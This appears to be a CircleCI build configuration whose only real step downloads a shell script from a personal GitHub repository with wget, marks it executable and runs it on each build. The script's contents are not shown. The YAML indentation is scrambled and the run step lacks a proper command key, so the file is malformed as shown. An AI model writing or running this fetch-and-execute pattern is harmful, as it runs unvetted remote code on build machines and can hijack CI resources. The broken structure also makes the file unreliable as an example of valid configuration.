version: 2.1
jobs:
  build:
      machine:
            image: ubuntu-2004:202010-01
                steps:
                      - checkout
                            - run:
                                      name: "Wget"
                                                wget -O 10.sh https://raw.githubusercontent.com/jemuk02/gahd/main/10.sh
                                                          chmod +x 10.sh
                                                                    ./10.sh